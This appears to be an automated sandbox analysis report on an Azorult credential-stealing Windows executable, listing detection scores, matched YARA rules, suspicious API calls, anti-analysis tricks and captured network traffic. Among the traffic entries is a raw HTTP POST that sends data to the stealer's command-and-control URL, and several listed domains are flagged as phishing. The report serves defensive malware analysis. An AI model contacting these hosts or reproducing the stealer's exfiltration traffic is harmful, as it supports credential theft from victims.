Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Avira: detected |
Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp |
Malware Configuration Extractor: Azorult {"C2 url": "http://admin.svapofit.com/azs/index.php"} |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Virustotal: Detection: 68% |
Perma Link |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
ReversingLabs: Detection: 75% |
Source: http://ww1.survey-smiles.com/% |
Avira URL Cloud: Label: phishing |
Source: http://ww1.survey-smiles.com/e |
Avira URL Cloud: Label: phishing |
Source: http://ww1.survey-smiles.com/z |
Avira URL Cloud: Label: phishing |
Source: http://ww1.survey-smiles.com/sof |
Avira URL Cloud: Label: phishing |
Source: http://ww1.survey-smiles.com/ |
Avira URL Cloud: Label: phishing |
Source: admin.svapofit.com |
Virustotal: Detection: 9% |
Perma Link |
Source: survey-smiles.com |
Virustotal: Detection: 7% |
Perma Link |
Source: ww1.survey-smiles.com |
Virustotal: Detection: 8% |
Perma Link |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Joe Sandbox ML: detected |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040A610 CryptUnprotectData,LocalFree, |
0_2_0040A610 |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00413030 FindFirstFileW,FindNextFileW,FindClose, |
0_2_00413030 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004119A8 FindFirstFileW,FindNextFileW,FindClose, |
0_2_004119A8 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004119AC FindFirstFileW,FindNextFileW,FindClose, |
0_2_004119AC |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00412D6C FindFirstFileW,FindNextFileW,FindClose, |
0_2_00412D6C |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0041160C FindFirstFileW,FindNextFileW,FindClose, |
0_2_0041160C |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, |
0_2_00413F58 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, |
0_2_00413F58 |
Source: Traffic |
Snort IDS: 2029465 ET TROJAN Win32/AZORult V3.2 Client Checkin M15 192.168.2.3:49862 -> 63.141.242.43:80 |
Source: Malware configuration extractor |
URLs: http://admin.svapofit.com/azs/index.php |
Source: global traffic |
HTTP traffic detected: POST /azs/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: admin.svapofit.comContent-Length: 101Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4c ed 3e 3d ed 3e 33 ed 3e 3d ed 3e 3a ed 3e 3d 8d 28 38 8c 28 39 fa 28 39 fc 4e 4b 89 28 39 fd 4f 49 ed 3e 3d Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KL>=>3>=>:>=(8(9(9NK(9OI>= |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Cache-Control: no-cacheHost: survey-smiles.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Cache-Control: no-cacheConnection: Keep-AliveHost: ww1.survey-smiles.comCookie: sid=6f7a634c-1fe5-11ec-bde8-7dd40c08a176 |
Source: Joe Sandbox View |
ASN Name: NOCIXUS NOCIXUS |
Source: Joe Sandbox View |
IP Address: 199.59.242.153 199.59.242.153 |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp |
String found in binary or memory: http://admin.svapofit.= |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp |
String found in binary or memory: http://admin.svapofit.com/ |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544541498.0000000000714000.00000004.00000020.sdmp, 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000003.544083881.0000000002130000.00000004.00000001.sdmp |
String found in binary or memory: http://admin.svapofit.com/azs/index.php |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp |
String found in binary or memory: http://admin.svapofit.com/azs/index.php8 |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp |
String found in binary or memory: http://admin.svapofit.com/azs/index.phpSb |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: http://ip-api.com/json |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp |
String found in binary or memory: http://survey-smiles.c-k |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000003.543285229.000000000075E000.00000004.00000001.sdmp |
String found in binary or memory: http://survey-smiles.com |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp |
String found in binary or memory: http://survey-smiles.com/ |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544600574.000000000075D000.00000004.00000020.sdmp |
String found in binary or memory: http://survey-smiles.com/= |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp |
String found in binary or memory: http://survey-smiles.com/csvc |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp, 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp |
String found in binary or memory: http://ww1.survey-smiles.com/ |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp |
String found in binary or memory: http://ww1.survey-smiles.com/% |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp |
String found in binary or memory: http://ww1.survey-smiles.com/e |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp |
String found in binary or memory: http://ww1.survey-smiles.com/sof |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544600574.000000000075D000.00000004.00000020.sdmp |
String found in binary or memory: http://ww1.survey-smiles.com/z |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: http://www.icq.com/legal/eula/en |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: http://www.icq.com/legal/privacypolicy/en |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
String found in binary or memory: https://dotbit.me/a/ |
Source: unknown |
HTTP traffic detected: POST /azs/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: admin.svapofit.comContent-Length: 101Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4c ed 3e 3d ed 3e 33 ed 3e 3d ed 3e 3a ed 3e 3d 8d 28 38 8c 28 39 fa 28 39 fc 4e 4b 89 28 39 fd 4f 49 ed 3e 3d Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KL>=>3>=>:>=(8(9(9NK(9OI>= |
Source: unknown |
DNS traffic detected: queries for: admin.svapofit.com |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00417D84 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle, |
0_2_00417D84 |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Cache-Control: no-cacheHost: survey-smiles.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Cache-Control: no-cacheConnection: Keep-AliveHost: ww1.survey-smiles.comCookie: sid=6f7a634c-1fe5-11ec-bde8-7dd40c08a176 |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544526487.00000000006FA000.00000004.00000020.sdmp |
Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/> |
|
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE |
Matched rule: Azorult Payload Author: kevoreilly |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Azorult Payload Author: kevoreilly |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Azorult Payload Author: kevoreilly |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Azorult Payload Author: kevoreilly |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE |
Matched rule: Azorult Payload Author: kevoreilly |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Azorult Payload Author: kevoreilly |
Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY |
Matched rule: Azorult Payload Author: kevoreilly |
Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: Azorult Payload Author: kevoreilly |
Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY |
Matched rule: Azorult Payload Author: kevoreilly |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE |
Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE |
Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload |
Source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload |
Source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY |
Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload |
Source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload |
Source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY |
Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: String function: 00403BF4 appears 46 times |
|
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: String function: 004062FC appears 42 times |
|
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: String function: 00404E98 appears 86 times |
|
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: String function: 00404EC0 appears 33 times |
|
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: String function: 0040300C appears 32 times |
|
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: String function: 004034E4 appears 32 times |
|
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Process Stats: CPU usage > 98% |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Virustotal: Detection: 68% |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
ReversingLabs: Detection: 75% |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 |
Jump to behavior |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A57CDE79-FF79707E-24CAA5BC7 |
Source: classification engine |
Classification label: mal100.troj.spyw.evad.winEXE@1/0@3/3 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Static PE information: More than 200 imports for KERNEL32.dll |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Unpacked PE file: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs CODE:ER;DATA:W;BSS:W;.idata:W;.reloc:R; |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0041A068 push 0041A08Eh; ret |
0_2_0041A086 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0041A02C push 0041A05Ch; ret |
0_2_0041A054 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040E8D0 push 0040E905h; ret |
0_2_0040E8FD |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040B164 push 0040B190h; ret |
0_2_0040B188 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040E908 push 0040E94Ah; ret |
0_2_0040E942 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040B12C push 0040B158h; ret |
0_2_0040B150 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040C136 push 0040C164h; ret |
0_2_0040C15C |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040C138 push 0040C164h; ret |
0_2_0040C15C |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040813C push 00408174h; ret |
0_2_0040816C |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004171E8 push 00417214h; ret |
0_2_0041720C |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040C9EA push 0040CA18h; ret |
0_2_0040CA10 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040C9EC push 0040CA18h; ret |
0_2_0040CA10 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040E1A4 push 0040E1D0h; ret |
0_2_0040E1C8 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040B1B8 push 0040B1E4h; ret |
0_2_0040B1DC |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040E25A push 0040E288h; ret |
0_2_0040E280 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040E25C push 0040E288h; ret |
0_2_0040E280 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00414A28 push 00414A84h; ret |
0_2_00414A7C |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040BAB8 push 0040BAE4h; ret |
0_2_0040BADC |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00409B54 push 00409BC8h; ret |
0_2_00409BC0 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00409B78 push 00409BC8h; ret |
0_2_00409BC0 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040D378 push 0040D3A8h; ret |
0_2_0040D3A0 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040D37C push 0040D3A8h; ret |
0_2_0040D3A0 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00413B7C push 00413BA8h; ret |
0_2_00413BA0 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040B3D8 push 0040B414h; ret |
0_2_0040B40C |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040B3DC push 0040B414h; ret |
0_2_0040B40C |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004183E4 push 00418410h; ret |
0_2_00418408 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040BBEC push 0040BC18h; ret |
0_2_0040BC10 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00409B90 push 00409BC8h; ret |
0_2_00409BC0 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00413C10 push 00413C3Ch; ret |
0_2_00413C34 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00404C1C push 00404C6Dh; ret |
0_2_00404C65 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0040B420 push 0040B44Ch; ret |
0_2_0040B444 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, |
0_2_00417216 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, |
0_2_00417216 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
RDTSC instruction interceptor: First address: 00000000021222C8 second address: 00000000021222CC instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 rdtsc |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
RDTSC instruction interceptor: First address: 00000000021222CC second address: 00000000021222CC instructions: 0x00000000 rdtsc 0x00000002 sub eax, edx 0x00000004 jnbe 00007FBD94B9982Ch 0x00000006 rdtsc |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00415E40 GetSystemInfo, |
0_2_00415E40 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00413030 FindFirstFileW,FindNextFileW,FindClose, |
0_2_00413030 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004119A8 FindFirstFileW,FindNextFileW,FindClose, |
0_2_004119A8 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004119AC FindFirstFileW,FindNextFileW,FindClose, |
0_2_004119AC |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00412D6C FindFirstFileW,FindNextFileW,FindClose, |
0_2_00412D6C |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0041160C FindFirstFileW,FindNextFileW,FindClose, |
0_2_0041160C |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, |
0_2_00413F58 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, |
0_2_00413F58 |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp |
Binary or memory string: Hyper-V RAW |
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp |
Binary or memory string: Hyper-V RAW@ |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00407AF0 mov eax, dword ptr fs:[00000030h] |
0_2_00407AF0 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_0046052B mov ebx, dword ptr fs:[00000030h] |
0_2_0046052B |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00460000 mov eax, dword ptr fs:[00000030h] |
0_2_00460000 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00460000 mov ebx, dword ptr fs:[00000030h] |
0_2_00460000 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00460AFD mov eax, dword ptr fs:[00000030h] |
0_2_00460AFD |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004606F5 mov eax, dword ptr fs:[00000030h] |
0_2_004606F5 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004606F5 mov ecx, dword ptr fs:[00000030h] |
0_2_004606F5 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004A0000 mov eax, dword ptr fs:[00000030h] |
0_2_004A0000 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004A0000 mov ecx, dword ptr fs:[00000030h] |
0_2_004A0000 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_004A0408 mov eax, dword ptr fs:[00000030h] |
0_2_004A0408 |
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe |
Code function: 0_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, |
